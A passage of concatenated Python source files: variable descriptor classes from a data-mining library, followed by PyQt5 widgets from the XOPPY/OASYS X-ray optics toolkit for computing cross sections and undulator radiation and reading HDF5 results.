        Return an existing continuous variable with the given name, or
        construct and return a new one.
        """
        existing_var = ContinuousVariable.all_continuous_vars.get(name)
        return existing_var or ContinuousVariable(name)

    @classmethod
    def _clear_cache(cls):
        """
        Clears the list of variables for reuse by :obj:`make`.
        """
        cls.all_continuous_vars.clear()

    @staticmethod
    def is_primitive():
        """ Return `True`: continuous variables are stored as floats."""
        return True

    def to_val(self, s):
        """
        Convert a value, given as an instance of an arbitrary type, to a float.
        """
        if s in self.unknown_str:
            return Unknown
        return float(s)

    def val_from_str_add(self, s):
        """
        Convert a value from a string and adjust the number of decimals if
        `adjust_decimals` is non-zero.
        """
        if s in self.unknown_str:
            return Unknown
        val = float(s)  # raise exception before setting the number of decimals
        if self.adjust_decimals and isinstance(s, str):
            #TODO: This may significantly slow down file reading.
            #      Is there something we can do about it?
            s = s.strip()
            i = s.find(".")
            ndec = len(s) - i - 1 if i > 0 else 0
            if self.adjust_decimals == 2:
                self.number_of_decimals = ndec
            elif ndec > self.number_of_decimals:
                self.number_of_decimals = ndec
            self.adjust_decimals = 1
        return val

    def repr_val(self, val):
        """
        Return the value as a string with the prescribed number of decimals.
        """
        if isnan(val):
            return "?"
        return self._out_format % val

    str_val = repr_val


class DiscreteVariable(Variable):
    """
    Descriptor for symbolic, discrete variables. Values of discrete
    variables are stored as floats; the numbers correspond to indices in
    the list of values.

    .. attribute:: values

        A list of variable's values.

    .. attribute:: ordered

        Some algorithms (and, in particular, visualizations) may sometimes
        reorder the values of the variable, e.g. alphabetically. This flag
        hints that the given order of values is "natural" (e.g. "small",
        "middle", "large") and should not be changed.

    .. attribute:: base_value

        The index of the base value, or -1 if there is none. The base value
        is used in some methods like, for instance, when creating dummy
        variables for regression.
""" all_discrete_vars = collections.defaultdict(set) presorted_values = [] def __init__(self, name="", values=(), ordered=False, base_value=-1): """ Construct a discrete variable descriptor with the given values. """ super().__init__(name) self.ordered = ordered self.values = list(values) self.base_value = base_value DiscreteVariable.all_discrete_vars[name].add(self) def __str__(self): """ Give a string representation of the variable, for instance, `"DiscreteVariable('Gender', values=['male', 'female'])"`. """ args = "values=[" + ", ".join(self.values[:5]) +\ "..." * (len(self.values) > 5) + "]" if self.ordered: args += ", ordered=True" if self.base_value >= 0: args += ", base_value={}".format(self.base_value) return "{}('{}', {})".format(self.__class__.__name__, self.name, args) @staticmethod def is_primitive(): """ Return `True`: discrete variables are stored as floats. """ return True def to_val(self, s): """ Convert the given argument to a value of the variable (`float`). If the argument is numeric, its value is returned without checking whether it is integer and within bounds. `Unknown` is returned if the argument is one of the representations for unknown values. Otherwise, the argument must be a string and the method returns its index in :obj:`values`. :param s: values, represented as a number, string or `None` :rtype: float """ if s is None: return ValueUnknown if isinstance(s, int): return s if isinstance(s, Real): return s if isnan(s) else floor(s + 0.25) if s in self.unknown_str: return ValueUnknown if not isinstance(s, str): raise TypeError('Cannot convert {} to value of "{}"'.format( type(s).__name__, self.name)) return self.values.index(s) def add_value(self, s): """ Add a value `s` to the list of values. """ self.values.append(s) def val_from_str_add(self, s): """ Similar to :obj:`to_val`, except that it accepts only strings and that it adds the value to the list if it does not exist yet. :param s: symbolic representation of the value :type s: str :rtype: float """ try: return ValueUnknown if s in self.unknown_str \ else self.values.index(s) except ValueError: self.add_value(s) return len(self.values) - 1 def repr_val(self, val): """ Return a textual representation of the value (`self.values[int(val)]`) or "?" if the value is unknown. :param val: value :type val: float (should be whole number) :rtype: str """ if isnan(val): return "?" return '{}'.format(self.values[int(val)]) str_val = repr_val @staticmethod def make(name, values=(), ordered=False, base_value=-1): """ Return a variable with the given name and other properties. The method first looks for a compatible existing variable: the existing variable must have the same name and both variables must have either ordered or unordered values. If values are ordered, the order must be compatible: all common values must have the same order. If values are unordered, the existing variable must have at least one common value with the new one, except when any of the two lists of values is empty. If a compatible variable is find, it is returned, with missing values appended to the end of the list. If there is no explicit order, the values are ordered using :obj:`ordered_values`. Otherwise, it constructs and returns a new variable descriptor. 
:param name: the name of the variable :type name: str :param values: symbolic values for the variable :type values: list :param ordered: tells whether the order of values is fixed :type ordered: bool :param base_value: the index of the base value, or -1 if there is none :type base_value: int :returns: an existing compatible variable or `None` """ var = DiscreteVariable._find_compatible( name, values, ordered, base_value) if var: return var if not ordered: base_value_rep = base_value != -1 and values[base_value] values = DiscreteVariable.ordered_values(values) if base_value != -1: base_value = values.index(base_value_rep) return DiscreteVariable(name, values, ordered, base_value) @staticmethod def _find_compatible(name, values=(), ordered=False, base_value=-1): """ Return a compatible existing value, or `None` if there is None. See :obj:`make` for details; this function differs by returning `None` instead of constructing a new descriptor. (Method :obj:`make` calls this function.) :param name: the name of the variable :type name: str :param values: symbolic values for the variable :type values: list :param ordered: tells whether the order of values is fixed :type ordered: bool :param base_value: the index of the base value, or -1 if there is none :type base_value: int :returns: an existing compatible variable or `None` """ base_rep = base_value != -1 and values[base_value] existing = DiscreteVariable.all_discrete_vars.get(name) if existing is None: return None if not ordered: values = DiscreteVariable.ordered_values(values) for var in existing: if (var.ordered != ordered or var.base_value != -1 and var.values[var.base_value] != base_rep): continue if not values: break # we have the variable - any existing values are OK if ordered: i = 0 for val in var.values: if values[i] == val: i += 1 if i == len(values): break # we have all the values else: # we have some remaining values: check them, add them if set(values[i:]) & set(var.values): continue # next var in existing for val in values[i:]: var.add_value(val) break # we have the variable else: # not ordered if var.values and not set(var.values) & set(values): continue # empty intersection of values; not compatible vv = set(var.values) for val in values: if val not in vv: var.add_value(val) break # we have the variable else: return None if base_value != -1 and var.base_value == -1: var.base_value = var.values.index(base_rep) return var @classmethod def _clear_cache(cls): """ Clears the list of variables for reuse by :obj:`make`. """ cls.all_discrete_vars.clear() @staticmethod def ordered_values(values): """ Return a sorted list of values. If there exists a prescribed order for such set of values, it is returned. Otherwise, values are sorted alphabetically. """ for presorted in DiscreteVariable.presorted_values: if values == set(presorted): return presorted return sorted(values) class StringVariable(Variable): """ Descriptor for string variables. String variables can only appear as meta attributes. """ all_string_vars = {} Unknown = None def __init__(self, name="", default_col=-1): """Construct a new descriptor.""" super().__init__(name) StringVariable.all_string_vars[name] = self @staticmethod def is_primitive(): """Return `False`: string variables are not stored as floats.""" return False @staticmethod def compute_value(_): return None def to_val(self, s): """ Return the value as a string. If it is already a string, the same object is returned. 
""" if s is None: return "" if isinstance(s, str): return s return str(s) val_from_str_add = to_val def str_val(self, val): """Return a string representation of the value.""" if isinstance(val, Value): if val.value is None: return "None" val = val.value return str(val) def repr_val(self, val): """Return a string representation of the value.""" return '"{}"'.format(self.str_val(val)) @staticmethod def make(name): """ Return an existing string variable with the given name, or construct and return a new one. """ existing_var = StringVariable.all_string_vars.get(name) return existing_var or StringVariable(name) @classmethod def _clear_cache(cls): """ Clears the list of variables for reuse by :obj:`make`. """ cls.all_string_vars.clear() Variable._variable_types += [DiscreteVariable, ContinuousVariable, StringVariable ] ``` #### File: xoppy/util/text_window.py ```python from PyQt5.QtWidgets import QWidget, QVBoxLayout, QMainWindow, QDialog from PyQt5.QtWidgets import QPlainTextEdit, QTextEdit class TextWindow(QMainWindow): def __init__(self, parent=None, title="", file=""): QMainWindow.__init__(self, parent) left = 10 top = 10 width = 700 height = 850 self.setWindowTitle(title) self.setGeometry(left, top, width, height) self.text_edit = QPlainTextEdit(self) self.text_edit.setReadOnly(True) self.text_edit.setFixedHeight(height-top) self.text_edit.setFixedWidth(width-left) if file != "": self.set_file(file) self.show() def clear(self): self.text_edit.setPlainText("") def set_text(self,text): self.clear() self.text_edit.setPlainText(text) def set_file(self,filename): text = open(filename).read() print("Displaying file: "+filename) self.setWindowTitle(filename) self.set_text(text) if __name__ == "__main__": from PyQt5.QtWidgets import QApplication app = QApplication([]) oo = TextWindow(file="/home/manuel/OASYS1.2/xoppy/orangecontrib/xoppy/util/doc_txt/us.txt") app.exec_() ``` #### File: widgets/optics/xcrosssec.py ```python import sys import numpy from PyQt5.QtWidgets import QApplication, QMessageBox from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from oasys.widgets.exchange import DataExchangeObject from orangecontrib.xoppy.util.xoppy_xraylib_util import cross_calc, cross_calc_mix, cross_calc_nist from orangecontrib.xoppy.util.xoppy_xraylib_util import nist_compound_list, density_element, density_nist from orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget # import xraylib class OWxcrosssec(XoppyWidget): name = "CrossSec" id = "orange.widgets.dataxcrosssec" description = "X-ray Matter Cross Sections" icon = "icons/xoppy_xcrosssec.png" priority = 19 category = "" keywords = ["xoppy", "xcrosssec"] MAT_FLAG = Setting(2) DESCRIPTOR = Setting("Si") MAT_LIST = Setting(177) DENSITY = Setting("?") CALCULATE = Setting(1) GRID = Setting(0) GRIDSTART = Setting(100.0) GRIDEND = Setting(10000.0) GRIDN = Setting(200) UNIT = Setting(0) DUMP_TO_FILE = Setting(0) # No FILE_NAME = Setting("CrossSec.dat") xtitle = None ytitle = None def build_gui(self): box = oasysgui.widgetBox(self.controlArea, self.name + " Input Parameters", orientation="vertical", width=self.CONTROL_AREA_WIDTH-5) idx = -1 #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "MAT_FLAG", label=self.unitLabels()[idx], addSpace=False, items=['Element(formula)', 'Compound(formula)', 'Compound(table)'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = 
gui.widgetBox(box) items = nist_compound_list() gui.comboBox(box1, self, "MAT_LIST", label=self.unitLabels()[idx], addSpace=False, items=items, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DESCRIPTOR", label=self.unitLabels()[idx], addSpace=False, orientation="horizontal") self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DENSITY", label=self.unitLabels()[idx], addSpace=False, valueType=str, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "CALCULATE", label=self.unitLabels()[idx], addSpace=False, items=['Total','PhotoElectric','Rayleigh','Compton','Total-Rayleigh'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "GRID", label=self.unitLabels()[idx], addSpace=False, items=['Standard', 'User defined', 'Single Value'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDSTART", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDEND", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GRIDN", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 10 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "UNIT", label=self.unitLabels()[idx], addSpace=False, items=['barn/atom [Cross Section] *see help*', 'cm^2 [Cross Section] *see help*', 'cm^2/g [Mass abs coef]', 'cm^-1 [Linear abs coef]'], valueType=int, orientation="horizontal", labelWidth=130) self.show_at(self.unitFlags()[idx], box1) # widget index 11 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "DUMP_TO_FILE", label=self.unitLabels()[idx], addSpace=True, items=["No", "Yes"], orientation="horizontal") self.show_at(self.unitFlags()[idx], box1) # widget index 12 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "FILE_NAME", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) gui.rubber(self.controlArea) def unitLabels(self): return ['material','table','formula','density', 'Cross section','Energy [eV] grid:', 'Starting Energy [eV]: ','To: ','Number of points','Units', 'Dump to file','File name'] def unitFlags(self): return ['True','self.MAT_FLAG == 2','self.MAT_FLAG <= 1 ','True', 'True','True', 'self.GRID != 0','self.GRID == 1','self.GRID == 1','True', 'True','self.DUMP_TO_FILE == 1'] def get_help_name(self): return 'crosssec' def check_fields(self): self.DESCRIPTOR = congruence.checkEmptyString(self.DESCRIPTOR, "formula") if self.GRID > 0: self.GRIDSTART = congruence.checkPositiveNumber(self.GRIDSTART, "Starting Energy") if self.GRID == 1: self.GRIDEND = congruence.checkStrictlyPositiveNumber(self.GRIDEND, "Energy to") 
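                # the user-defined energy grid must run upward: GRIDSTART strictly below GRIDEND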
                congruence.checkLessThan(self.GRIDSTART, self.GRIDEND, "Starting Energy", "Energy to")
                self.GRIDN = congruence.checkStrictlyPositiveNumber(self.GRIDN, "Number of points")

    def do_xoppy_calculation(self):
        out_dict = self.xoppy_calc_xcrosssec()

        if "info" in out_dict.keys():
            print(out_dict["info"])

        # send exchange
        calculated_data = DataExchangeObject("XOPPY", self.get_data_exchange_widget_name())

        try:
            calculated_data.add_content("xoppy_data", out_dict["data"].T)
            calculated_data.add_content("plot_x_col", 0)
            calculated_data.add_content("plot_y_col", -1)
        except:
            pass
        try:
            calculated_data.add_content("labels", out_dict["labels"])
        except:
            pass
        try:
            calculated_data.add_content("info", out_dict["info"])
        except:
            pass

        return calculated_data

    def extract_data_from_xoppy_output(self, calculation_output):
        try:
            calculation_output.get_content("xoppy_data")
            labels = calculation_output.get_content("labels")
            self.xtitle = labels[0]
            self.ytitle = labels[1]
        except:
            QMessageBox.information(self,
                                    "Calculation Result",
                                    "Calculation Result:\n" + calculation_output.get_content("info"),
                                    QMessageBox.Ok)
            self.xtitle = None
            self.ytitle = None
        return calculation_output

    def plot_results(self, calculated_data, progressBarValue=80):
        self.initializeTabs()
        try:
            calculated_data.get_content("xoppy_data")
            super().plot_results(calculated_data, progressBarValue)
        except:
            self.plot_info(calculated_data.get_content("info") + "\n", progressBarValue, 0, 0)

    def get_data_exchange_widget_name(self):
        return "XCROSSSEC"

    def getTitles(self):
        return ["Calculation Result"]

    def getXTitles(self):
        if self.xtitle is None:
            return [""]
        else:
            return [self.xtitle]

    def getYTitles(self):
        if self.ytitle is None:
            return [""]
        else:
            return [self.ytitle]

    def getLogPlot(self):
        return [(True, True)]

    def getVariablesToPlot(self):
        return [(0, 1)]

    def xoppy_calc_xcrosssec(self):
        MAT_FLAG = self.MAT_FLAG
        MAT_LIST = self.MAT_LIST
        # DESCRIPTOR = self.DESCRIPTOR
        # density = self.DENSITY
        CALCULATE = self.CALCULATE
        GRID = self.GRID
        GRIDSTART = self.GRIDSTART
        GRIDEND = self.GRIDEND
        GRIDN = self.GRIDN
        UNIT = self.UNIT

        if MAT_FLAG == 0:  # element
            descriptor = self.DESCRIPTOR
            # density = element_density(DESCRIPTOR)
            try:
                density = float(self.DENSITY)
            except:
                density = density_element(self.DESCRIPTOR, verbose=True)
        elif MAT_FLAG == 1:  # compound
            descriptor = self.DESCRIPTOR
            try:
                density = float(self.DENSITY)
            except:
                raise Exception("Density must be entered.")
        elif MAT_FLAG == 2:  # nist list
            descriptor = nist_compound_list()[self.MAT_LIST]
            try:
                density = float(self.DENSITY)
            except:
                density = density_nist(descriptor, verbose=True)

        print("xoppy_calc_xcrosssec: using density = %g g/cm3" % density)

        if GRID == 0:
            # standard grid: 300 logarithmically spaced points per decade factor
            energy = numpy.arange(0, 500)
            elefactor = numpy.log10(10000.0 / 30.0) / 300.0
            energy = 10.0 * 10**(energy * elefactor)
        elif GRID == 1:
            if GRIDN == 1:
                energy = numpy.array([GRIDSTART])
            else:
                energy = numpy.linspace(GRIDSTART, GRIDEND, GRIDN)
        elif GRID == 2:
            energy = numpy.array([GRIDSTART])

        if MAT_FLAG == 0:  # element
            out = cross_calc(descriptor, energy, calculate=CALCULATE, density=density)
        elif MAT_FLAG == 1:  # compound parse
            out = cross_calc_mix(descriptor, energy, calculate=CALCULATE, density=density)
        elif MAT_FLAG == 2:  # NIST compound
            out = cross_calc_nist(descriptor, energy, calculate=CALCULATE, density=density)

        calculate_items = ['Total', 'PhotoElectric', 'Rayleigh', 'Compton', 'Total minus Rayleigh']
        unit_items = ['barn/atom', 'cm^2', 'cm^2/g', 'cm^-1']

        if energy.size > 1:
            tmp_x = out[0, :].copy()
            tmp_y = out[UNIT + 1, :].copy()
            tmp =
numpy.vstack((tmp_x,tmp_y)) labels = ["Photon energy [eV]","%s cross section [%s]"%(calculate_items[CALCULATE],unit_items[UNIT])] to_return = {"application":"xoppy","name":"xcrosssec","data":tmp,"labels":labels} else: tmp = None txt = "xoppy_calc_xcrosssec: Calculated %s cross section: %g %s"%(calculate_items[CALCULATE],out[UNIT+1,0],unit_items[UNIT]) print(txt) to_return = {"application":"xoppy","name":"xcrosssec","info":txt} if self.DUMP_TO_FILE: with open(self.FILE_NAME, "w") as file: try: file.write("#F %s\n"%self.FILE_NAME) file.write("\n#S 1 xoppy CrossSec results\n") file.write("#N 5\n") tmp = "#L Photon energy [eV]" for unit_item in unit_items: tmp += " %s [%s]"%(calculate_items[CALCULATE],unit_item) tmp += "\n" file.write(tmp) for j in range(out.shape[1]): # file.write("%19.12e "%energy[j]) file.write(("%19.12e "*out.shape[0]+"\n")%tuple(out[i,j] for i in range(out.shape[0]))) file.close() print("File written to disk: %s \n"%self.FILE_NAME) except: raise Exception("CrossSec: The data could not be dumped onto the specified file!\n") return to_return if __name__ == "__main__": app = QApplication(sys.argv) w = OWxcrosssec() w.show() app.exec() w.saveSettings() ``` #### File: widgets/source/undulator_radiation.py ```python import sys from PyQt5.QtWidgets import QApplication from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from oasys.widgets.exchange import DataExchangeObject from orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget from orangecontrib.xoppy.util.xoppy_undulators import xoppy_calc_undulator_radiation from syned.widget.widget_decorator import WidgetDecorator import syned.beamline.beamline as synedb import syned.storage_ring.magnetic_structures.insertion_device as synedid try: from silx.gui.dialog.DataFileDialog import DataFileDialog except: print("Fail to import silx.gui.dialog.DataFileDialog: need silx >= 0.7") import scipy.constants as codata import os import h5py from oasys.widgets.gui import ConfirmDialog class OWundulator_radiation(XoppyWidget, WidgetDecorator): name = "Undulator Radiation" id = "orange.widgets.dataundulator_radiation" description = "Undulator Radiation" icon = "icons/xoppy_undulator_radiation.png" priority = 5 category = "" keywords = ["xoppy", "undulator_radiation"] # overwrite from outputs = [{"name": "xoppy_data", "type": DataExchangeObject, "doc": ""}] USEEMITTANCES=Setting(1) ELECTRONENERGY = Setting(6.04) ELECTRONENERGYSPREAD = Setting(0.001) ELECTRONCURRENT = Setting(0.2) ELECTRONBEAMSIZEH = Setting(0.000395) ELECTRONBEAMSIZEV = Setting(9.9e-06) ELECTRONBEAMDIVERGENCEH = Setting(1.05e-05) ELECTRONBEAMDIVERGENCEV = Setting(3.9e-06) PERIODID = Setting(0.018) NPERIODS = Setting(222) KV = Setting(1.68) KH = Setting(0.0) KPHASE = Setting(0.0) DISTANCE = Setting(30.0) SETRESONANCE = Setting(0) HARMONICNUMBER = Setting(1) GAPH = Setting(0.003) GAPV = Setting(0.003) HSLITPOINTS = Setting(41) VSLITPOINTS = Setting(41) PHOTONENERGYMIN = Setting(6000.0) PHOTONENERGYMAX = Setting(8500.0) PHOTONENERGYPOINTS = Setting(20) METHOD = Setting(2) H5_FILE_DUMP = Setting(0) inputs = WidgetDecorator.syned_input_data() filename = "" def __init__(self): super().__init__(show_script_tab=True) def build_gui(self): tabs_setting = oasysgui.tabWidget(self.controlArea) tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5) tab_1 = oasysgui.createTabPage(tabs_setting, self.name + " Input Parameters") tab_2 = oasysgui.createTabPage(tabs_setting, "Calculation Setting") box = 
oasysgui.widgetBox(tab_1, "", orientation="vertical", width=self.CONTROL_AREA_WIDTH-15) idx = -1 # # # idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "USEEMITTANCES", label=self.unitLabels()[idx], addSpace=False, items=['No', 'Yes'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 0 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONENERGY = oasysgui.lineEdit(box1, self, "ELECTRONENERGY", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONENERGYSPREAD = oasysgui.lineEdit(box1, self, "ELECTRONENERGYSPREAD", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONCURRENT = oasysgui.lineEdit(box1, self, "ELECTRONCURRENT", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMSIZEH = oasysgui.lineEdit(box1, self, "ELECTRONBEAMSIZEH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMSIZEV = oasysgui.lineEdit(box1, self, "ELECTRONBEAMSIZEV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMDIVERGENCEH = oasysgui.lineEdit(box1, self, "ELECTRONBEAMDIVERGENCEH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) self.id_ELECTRONBEAMDIVERGENCEV = oasysgui.lineEdit(box1, self, "ELECTRONBEAMDIVERGENCEV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) self.id_PERIODID = oasysgui.lineEdit(box1, self, "PERIODID", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) self.id_NPERIODS = oasysgui.lineEdit(box1, self, "NPERIODS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) self.id_KV = oasysgui.lineEdit(box1, self, "KV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9B idx += 1 box1 = gui.widgetBox(box) self.id_KH = oasysgui.lineEdit(box1, self, "KH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 9C idx += 1 box1 = gui.widgetBox(box) self.id_KPHASE = oasysgui.lineEdit(box1, self, "KPHASE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) 
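        # KPHASE is the Kh-Kv phase difference in rad (see unitLabels); like KH it is
        # hidden when METHOD == 3 (pySRU), per the "self.METHOD != 3" unit flag below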
self.show_at(self.unitFlags()[idx], box1) box = oasysgui.widgetBox(tab_2, "", orientation="vertical", width=self.CONTROL_AREA_WIDTH-15) #widget index 10 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "DISTANCE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) # widget <><><> idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "SETRESONANCE", label=self.unitLabels()[idx], addSpace=False, items=['User defined', 'Set to resonance/central cone','Set to resonance/up to first ring'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget <><><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "HARMONICNUMBER", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 11 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GAPH", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 12 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "GAPV", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 13 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "HSLITPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 14 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "VSLITPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYMIN", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYMAX", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index <><> idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "PHOTONENERGYPOINTS", label=self.unitLabels()[idx], addSpace=False, valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 15 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "METHOD", label=self.unitLabels()[idx], addSpace=False, items=['US', 'URGENT', 'SRW','pySRU'], valueType=int, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) #widget index 16 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "H5_FILE_DUMP", label=self.unitLabels()[idx], addSpace=False, items=['None', 'Write h5 file: undulator_radiation.h5','Read from file...'], valueType=int, orientation="horizontal", labelWidth=250, callback=self.read_or_write_file) self.show_at(self.unitFlags()[idx], box1) def read_or_write_file(self): value = self.H5_FILE_DUMP if value == 0: return elif value == 1: # write return elif value == 2: # read self.H5_FILE_DUMP = 0 use_silx_file_dialog = False # silx dialog is freezing the linux system, change to traditional if use_silx_file_dialog: 
                tmp = ConfirmDialog.confirmed(self,
                                              message="Please select in a hdf5 file a data block\n(such as XOPPY_RADIATION)\nthat contains a 'Radiation' entry",
                                              title="Confirm Action")
                if tmp == False: return
                dialog = DataFileDialog(self)
                dialog.setFilterMode(DataFileDialog.FilterMode.ExistingGroup)
                result = dialog.exec_()
                if not result:
                    return
                print(dialog.selectedFile())
                print(dialog.selectedUrl())
                print(dialog.selectedDataUrl().data_path())
                calculation_output = self.extract_data_from_h5file(dialog.selectedFile(),
                                                                   dialog.selectedDataUrl().data_path())
                self.filename = dialog.selectedFile()
            else:
                tmp = ConfirmDialog.confirmed(self,
                                              message="Please select a hdf5 file containing a data block\n named XOPPY_RADIATION which includes 'Radiation' entry",
                                              title="Confirm Action")
                if tmp == False: return
                self.filename = oasysgui.selectFileFromDialog(self,
                                                              previous_file_path=self.filename,
                                                              message="Open hdf5 File",
                                                              start_directory="",
                                                              file_extension_filter="*.*5")
                if self.filename == "":
                    return
                try:
                    calculation_output = self.extract_data_from_h5file(self.filename, "/XOPPY_RADIATION")
                except:
                    calculation_output = None

            if calculation_output is None:
                raise Exception("Bad data from file.")
            else:
                self.calculated_data = self.extract_data_from_xoppy_output(calculation_output)
                try:
                    self.set_fields_from_h5file(self.filename, "/XOPPY_RADIATION")
                except:
                    pass

            # self.add_specific_content_to_calculated_data(self.calculated_data)
            # self.setStatusMessage("Plotting Results")

            self.plot_results(self.calculated_data, progressBarValue=60)
            self.setStatusMessage("")
            self.send("xoppy_data", self.calculated_data)

            self.set_enabled(True)

    def extract_data_from_h5file(self, file_h5, subtitle):
        hf = h5py.File(file_h5, 'r')

        try:
            p = hf[subtitle + "/Radiation/stack_data"].value
            e = hf[subtitle + "/Radiation/axis0"].value
            h = hf[subtitle + "/Radiation/axis1"].value
            v = hf[subtitle + "/Radiation/axis2"].value
        except Exception as exc:
            # bind the caught exception explicitly; a bare "except:" here would
            # reference a name that is unbound when the first read fails
            raise Exception("Data not plottable: bad content\n" + str(exc))

        code = "unknown"
        try:
            if hf[subtitle + "/parameters/METHOD"].value == 0:
                code = 'US'
            elif hf[subtitle + "/parameters/METHOD"].value == 1:
                code = 'URGENT'
            elif hf[subtitle + "/parameters/METHOD"].value == 2:
                code = 'SRW'
            elif hf[subtitle + "/parameters/METHOD"].value == 3:
                code = 'pySRU'
        except:
            pass

        hf.close()

        return e, h, v, p, code

